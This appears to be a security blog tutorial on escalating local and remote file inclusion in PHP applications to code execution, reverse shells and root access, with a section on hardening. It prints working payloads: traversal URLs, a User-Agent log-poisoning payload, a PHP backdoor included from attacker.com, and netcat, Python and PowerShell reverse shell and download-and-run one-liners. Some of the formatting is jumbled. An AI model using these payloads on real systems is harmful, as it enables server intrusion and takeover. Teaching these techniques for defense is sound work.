Listen to this Post

Introduction:
In the world of web application security, discovering a vulnerability is merely the first step; understanding the escalation path from a simple file read to total system control separates script kiddies from serious professionals. Local File Inclusion (LFI) and Remote File Inclusion (RFI) are often misclassified as “disclosure” issues, but when chained with reverse shell techniques, they become the primary vectors for remote code execution (RCE) and full server compromise. This article dissects the mechanics of these attacks, providing the technical commands and step-by-step methodologies used by adversaries, and equips defenders with the knowledge to harden their systems effectively.
Learning Objectives:
- Understand the technical difference between LFI and RFI and how they can be escalated to Remote Code Execution (RCE).
- Master the syntax for manual exploitation, including path traversal, PHP wrappers, and log poisoning.
- Learn how to deploy and catch reverse shells using common tools like Netcat and Python.
- Implement defensive configurations and monitoring rules to detect and prevent these attacks.
You Should Know:
- Local File Inclusion (LFI) – From File Disclosure to Code Execution
LFI occurs when an application uses user-supplied input to include files without proper sanitization. While it often starts with reading files, the endgame is always RCE.
Step‑by‑step guide explaining what this does and how to use it.
First, verify the vulnerability by attempting path traversal to read sensitive system files.
– Linux Payload:
`http://target.com/page.php?file=../../../../etc/passwd`
– Windows Payload:
`http://target.com/page.php?file=../../../../windows/win.ini`
If the application returns the content, you have LFI. However, modern PHP configurations often use extensions (e.g., include($page . '.php');). To bypass this, use a null byte injection (%00) in PHP versions prior to 5.3.4, or use a query string to terminate the filename:
`http://target.com/page.php?file=../../../../etc/passwd%00`
Escalating to RCE via PHP Wrappers:
If file inclusion is possible, use PHP wrappers to execute code directly.
– Using `php://filter` for Source Code Reading:
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=index.php`allow_url_include=On`. Send a POST request with malicious PHP code.
<h2 style="color: yellow;">(Decode the base64 output to view the source).</h2>
- Using `php://input` for Command Execution:
This requires
curl -X POST -d "<?php system('id'); ?>" "http://target.com/page.php?file=php://input"
Escalation via Log Poisoning:
If wrappers are disabled, poison the server logs. Inject PHP code into the User-Agent header and then include the log file.
1. Send a request with a malicious User-Agent:
curl -A "<?php system(\$_GET['cmd']); ?>" "http://target.com/page.php?file=index"
2. Include the log file and execute commands:
`http://target.com/page.php?file=/var/log/apache2/access.log&cmd=id`
- Remote File Inclusion (RFI) – Direct Path to System Control
RFI is the more dangerous cousin of LFI. If `allow_url_include` is enabled, an attacker can include a malicious file hosted on a remote server, leading to immediate code execution.
Step‑by‑step guide explaining what this does and how to use it.
First, host a malicious PHP script on a server you control. Create a file named `shell.txt` (to avoid MIME-type filters) containing:
<?php
// Simple backdoor
if(isset($_GET['cmd'])){
system($_GET['cmd']);
}
// Or a more advanced reverse shell payload
?>
Now, attempt to include it:
`http://target.com/page.php?file=http://attacker.com/shell.txt&cmd=whoami`
If successful, the server executes your PHP code, and the `cmd` parameter is passed to the `system()` function.
To bypass file extension restrictions, append a null byte or a query string:
`http://target.com/page.php?file=http://attacker.com/shell.txt?`
Windows RFI Considerations:
While RFI is often associated with PHP on Linux, Windows servers with PHP or ASP applications are equally vulnerable. Attackers can use SMB shares to host malicious code:
`http://target.com/page.php?file=\\\\attacker_ip\\share\\shell.php`
3. Deploying the Reverse Shell – Gaining Interactive Access
Once you have RCE via LFI/RFI, the next step is to upgrade that ephemeral command execution to a persistent, interactive reverse shell.
Step‑by‑step guide explaining what this does and how to use it.
On the Attacker’s Machine (Listener):
Set up a Netcat listener to catch the incoming connection.
nc -lvnp 4444
– -l: Listen mode
– -v: Verbose
– -n: No DNS resolution
– -p: Port 4444
On the Target (Payload Delivery):
You need to execute a command via your LFI/RFI vector that forces the server to connect back to you.
- Common Linux Netcat Payload:
`nc -e /bin/sh YOUR_IP 4444`
(If `-e` is disabled, use a mkfifo one-liner).
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f
– Python One-Liner:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
– Powershell (Windows Target):
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP/ps.ps1');"
(Where `ps.ps1` contains a standard PowerShell reverse shell script).
4. Defensive Measures – Hardening Against File Inclusion
Understanding the offense is useless without a solid defense. Here are the exact configurations to block these attacks.
Code-Level Fixes (PHP):
Never trust user input.
- Use an Allowlist:
<?php $allowed_pages = array('home', 'about', 'contact'); if (in_array($_GET['file'], $allowed_pages)) { include($_GET['file'] . '.php'); } else { // Error handling } ?> - Disable Dangerous PHP Directives: In
php.ini:allow_url_include = Off allow_url_fopen = Off disable_functions = system, exec, shell_exec, passthru, popen
System-Level Hardening:
- Filesystem Permissions: Ensure web server users (e.g.,
www-data) do not have write access to web directories unless absolutely necessary. This prevents log poisoning. - Database Security: If you must include files dynamically, store file paths in the database and map them to IDs, rather than accepting raw paths from the user.
- WAF Rules: Deploy a Web Application Firewall (ModSecurity with OWASP Core Rule Set) to block patterns like
../,://, andphp://filter.
Network-Level Monitoring:
Monitor for unusual outbound connections (egress filtering). A web server should not initiate connections to the internet on high-numbered ports (like 4444). Alert on nc, python, or `powershell` processes spawned by the web server user.
5. Privilege Escalation Post-Exploitation
Gaining a reverse shell as `www-data` is not the end; attackers escalate to root.
Step‑by‑step guide explaining what this does and how to use it.
Once inside the reverse shell:
1. Stabilize the Shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Then background it (Ctrl+Z), run stty raw -echo; fg, and export TERM=xterm.
2. Enumerate the System:
- Check for SUID binaries: `find / -perm -4000 2>/dev/null`
– Check kernel version: `uname -a`
– Check sudo permissions: `sudo -l`
– Look for world-writable files or misconfigured cron jobs.
3. Exploit a Misconfiguration:
For example, if `sudo -l` shows you can run `vim` as root without a password:
sudo vim -c '!sh'
What Undercode Say:
- LFI is rarely just a read issue: In modern web environments, chaining LFI with log poisoning or PHP wrappers transforms a medium-severity bug into a critical RCE. Defenders must treat any file path input as a potential code execution vector.
- RFI remains a catastrophic failure: The fact that `allow_url_include` is still enabled on production servers in 2024 indicates a fundamental breakdown in secure configuration management. Automation and infrastructure-as-code should eliminate these legacy risks.
- Reverse shells are the bridge to the kingdom: The ability to detect anomalous outbound traffic (egress filtering) is often the last line of defense. If an attacker gains RCE but cannot connect out, the impact is significantly contained. Organizations must move beyond perimeter firewalls to host-based egress controls.
Prediction:
As web applications become increasingly reliant on third-party libraries and complex dependency chains, the attack surface for file inclusion will expand beyond PHP. We will likely see a resurgence of LFI/RFI-type vulnerabilities in serverless functions and cloud storage buckets where path traversal is misinterpreted as “object key” manipulation. The future of exploitation will involve chaining these classic web bugs with AI-generated payloads to bypass signature-based detection, forcing a shift toward behavioral analysis and egress monitoring as the primary defensive strategy.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Mubashir Hassan – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


